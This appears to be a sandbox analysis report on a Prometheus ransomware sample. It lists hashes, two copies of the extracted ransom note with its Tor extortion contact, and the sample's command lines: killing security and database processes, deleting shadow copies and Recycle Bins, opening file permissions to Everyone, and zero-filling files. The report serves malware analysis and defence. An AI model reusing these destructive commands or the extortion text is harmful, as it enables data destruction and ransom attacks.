Overview

overview

10

Static

static

20d9efe472...in.exe

windows7_x64

10

20d9efe472...in.exe

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-05-2021 06:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe

  • Size

    222KB

  • MD5

    1493deb48d84805f19ba35e60d485e87

  • SHA1

    a34a1aeda6019b041f112b1ddbbc290ef523042b

  • SHA256

    20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5

  • SHA512

    ce83d28d70a0d3f108431aa31858030a2cfb91d77f470fd7ef4aecbcd213541f4e393e2d59cdad1d2578dbd3411f43be9c1612e2a63dab8560bc64a16bb589ef

Score
10/10
prometheusdiscoveryevasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: GdOgdPDhucVMKOmOUql3cp17Cej9kR1B8p5jHYKOXxzgENTj21dg0jLW97bUEtOQqcf28UDOKX4aPwZ6Ol3GVyOFgXmwk+mOLwX07Y3dS9K6K7HKLVzjPgKE87KfLSNEQSrP+h200/imfPCltL9XcWkBVNv3PimI/DLHDZl498vLSFwanWFnlhN9Nj9PVufyzP/2qEnRBus0Nz+8nIyrvupJMGoBouIjflO/RKnnDlOO7dvQkmHUBdxRweS+fKBpFV5Mn7/PLGhXFAPHuM4TY0cPomxiOwtbDRG9IvyW2itnFDGyBUHzzfLTO9sVhQWBcWS4U/rN18o3YGcuOwwteA1egeB1s802kdK+HdSCye3lf6ROYoGhIzmeKxJEPr0JaJixxVamiofxkSPjNgxb+Q0Qk0hYC7UZdHt58lFGSwVbQyDOOSDVljig3liKvGN5AiM++Az5g8Lhy+Zzv28wQGfTfoj/fPVyxrS6yjrv3l9M18rDoBhX2TuuKJwyqMJeG74N2ZQCguoKysBhnJfDYRQ4CrpWYYkwCeyeTFf54sGSCmfaxg9/zRBav/FFXYDkhbiP7lcY+kCT5LaKcMXoPMdDEoITTG8qwo7WIcHQhhUafLz13fjnqmXZdC/lGSIWrkHRRjlrNC0cThyXcXjpP4RJnLX+VwkH4A2IJRAtd/A=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: GdOgdPDhucVMKOmOUql3cp17Cej9kR1B8p5jHYKOXxzgENTj21dg0jLW97bUEtOQqcf28UDOKX4aPwZ6Ol3GVyOFgXmwk+mOLwX07Y3dS9K6K7HKLVzjPgKE87KfLSNEQSrP+h200/imfPCltL9XcWkBVNv3PimI/DLHDZl498vLSFwanWFnlhN9Nj9PVufyzP/2qEnRBus0Nz+8nIyrvupJMGoBouIjflO/RKnnDlOO7dvQkmHUBdxRweS+fKBpFV5Mn7/PLGhXFAPHuM4TY0cPomxiOwtbDRG9IvyW2itnFDGyBUHzzfLTO9sVhQWBcWS4U/rN18o3YGcuOwwteA1egeB1s802kdK+HdSCye3lf6ROYoGhIzmeKxJEPr0JaJixxVamiofxkSPjNgxb+Q0Qk0hYC7UZdHt58lFGSwVbQyDOOSDVljig3liKvGN5AiM++Az5g8Lhy+Zzv28wQGfTfoj/fPVyxrS6yjrv3l9M18rDoBhX2TuuKJwyqMJeG74N2ZQCguoKysBhnJfDYRQ4CrpWYYkwCeyeTFf54sGSCmfaxg9/zRBav/FFXYDkhbiP7lcY+kCT5LaKcMXoPMdDEoITTG8qwo7WIcHQhhUafLz13fjnqmXZdC/lGSIWrkHRRjlrNC0cThyXcXjpP4RJnLX+VwkH4A2IJRAtd/A=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

    ransomwareprometheus
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1456
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1268
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2252
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:844
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3940
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:1096
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config Dnscache start= auto
            2⤵
              PID:3440
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:200
              • C:\Windows\SYSTEM32\sc.exe
                "sc.exe" config FDResPub start= auto
                2⤵
                  PID:2840
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" config SSDPSRV start= auto
                  2⤵
                    PID:2104
                  • C:\Windows\SYSTEM32\sc.exe
                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                    2⤵
                      PID:2112
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd.exe" /c rd /s /q D:\\$Recycle.bin
                      2⤵
                        PID:2264
                      • C:\Windows\SYSTEM32\sc.exe
                        "sc.exe" config SstpSvc start= disabled
                        2⤵
                          PID:3944
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" config upnphost start= auto
                          2⤵
                            PID:184
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" config SQLWriter start= disabled
                            2⤵
                              PID:2052
                            • C:\Windows\SYSTEM32\netsh.exe
                              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                              2⤵
                                PID:1084
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mspub.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3020
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM synctime.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:196
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mspub.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3196
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mydesktopqos.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2784
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM Ntrtscan.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2260
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mysqld.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2992
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4104
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM isqlplussvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4116
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM sqbcoreservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4176
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM firefoxconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4264
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM onenote.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4300
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM encsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4312
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM excel.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4392
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM agntsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4488
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM PccNTMon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4500
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM dbeng50.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4552
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM CNTAoSMgr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4608
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM thebat.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4688
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM msaccess.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4700
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM thebat64.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4800
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM sqlwriter.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4812
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM outlook.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4880
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM steam.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4916
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM ocomm.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5024
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM tbirdconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5056
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM tmlisten.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5104
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" IM thunderbird.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:1116
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM dbsnmp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1028
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM infopath.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1304
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM wordpad.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4140
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM msftesql.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4328
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mbamtray.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4188
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM xfssvccon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4452
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mysqld-opt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4332
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM powerpnt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4476
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM zoolz.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4572
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM ocautoupds.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4584
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM mydesktopqos.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4724
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM ocssd.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4808
                              • C:\Windows\SYSTEM32\taskkill.exe
                                "taskkill.exe" /IM visio.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4764
                              • C:\Windows\SYSTEM32\netsh.exe
                                "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                2⤵
                                  PID:4264
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM oracle.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2784
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4312
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM winword.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4840
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM sqlagent.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5040
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM mysqld-nt.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5112
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM sqlbrowser.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4976
                                • C:\Windows\SYSTEM32\taskkill.exe
                                  "taskkill.exe" /IM sqlservr.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2056
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                  2⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2320
                                • C:\Windows\SYSTEM32\icacls.exe
                                  "icacls" "C:*" /grant Everyone:F /T /C /Q
                                  2⤵
                                  • Modifies file permissions
                                  PID:4040
                                • C:\Windows\SYSTEM32\icacls.exe
                                  "icacls" "D:*" /grant Everyone:F /T /C /Q
                                  2⤵
                                  • Modifies file permissions
                                  PID:4252
                                • C:\Windows\SYSTEM32\icacls.exe
                                  "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                  2⤵
                                  • Modifies file permissions
                                  PID:2064
                                • C:\Windows\System32\mshta.exe
                                  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                  2⤵
                                    PID:4504
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                    2⤵
                                      PID:4884
                                      • C:\Windows\system32\PING.EXE
                                        ping 127.0.0.7 -n 3
                                        3⤵
                                        • Runs ping.exe
                                        PID:2156
                                      • C:\Windows\system32\fsutil.exe
                                        fsutil file setZeroData offset=0 length=524288 “%s”
                                        3⤵
                                          PID:508
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe
                                        2⤵
                                          PID:5080
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 3
                                            3⤵
                                              PID:4924

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
                                          Filesize

                                          2KB

                                          MD5

                                          4f3f4587ffa39c36a942c37be9a3762a

                                          SHA1

                                          63ae0769e376e84c51c7af383a55803976fd19cf

                                          SHA256

                                          f333935a6f8d460adc8236149cf61fc878c6871cb11b92dba84640ff8a79b977

                                          SHA512

                                          80d7ba8c329ccbff799b117bfe8bec18dbc9e603f22b2102062d607a8910e78714def0879855049636dcce9039bd16066274f639fdded729e897a65eb4db9e51

                                          Download Submit

                                        • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                          Filesize

                                          21KB

                                          MD5

                                          38ecadbf00f22a15521c7bd35c38663b

                                          SHA1

                                          c8543d4f231db8d7b0b03c3a0f99be287ded5004

                                          SHA256

                                          5aa3c8dc39354d3ab48ef62f7d6365c92ccaafc0a9cadc5bc76acf8de56f837f

                                          SHA512

                                          8745b3572a37d13ba9b51d2bcbdb3a6bc773ea235173f777a8dbfdb222485efada4c9e0a8455e8ef5accf4004e521c66599750331bf9edb04d97307e990e87c2

                                          Download Submit

                                        • memory/184-129-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/196-133-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/200-124-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/844-119-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1028-159-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1084-131-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1096-121-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1116-158-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1268-117-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1304-160-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1456-114-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/1456-116-0x00000000015F0000-0x00000000015F2000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/2052-130-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2056-179-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2104-125-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2112-126-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2252-118-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2260-136-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2264-127-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2320-192-0x000001D64B150000-0x000001D64B151000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/2320-206-0x000001D630976000-0x000001D630978000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/2320-186-0x000001D64AFA0000-0x000001D64AFA1000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/2320-193-0x000001D630970000-0x000001D630972000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/2320-194-0x000001D630973000-0x000001D630975000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/2320-180-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2784-135-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2784-173-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2840-123-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2992-137-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3020-132-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3196-134-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3440-122-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3940-120-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3944-128-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4104-138-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4116-139-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4140-161-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4176-140-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4188-163-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4264-141-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4264-172-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4300-142-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4312-143-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4312-174-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4328-162-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4332-165-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4392-144-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4452-164-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4476-166-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4488-145-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4500-146-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4552-147-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4572-167-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4584-168-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4608-148-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4688-149-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4700-150-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4724-169-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4764-171-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4800-151-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4808-170-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4812-152-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4840-175-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4880-153-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4916-154-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/4976-178-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/5024-155-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/5040-176-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/5056-156-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/5104-157-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/5112-177-0x0000000000000000-mapping.dmp

                                          Download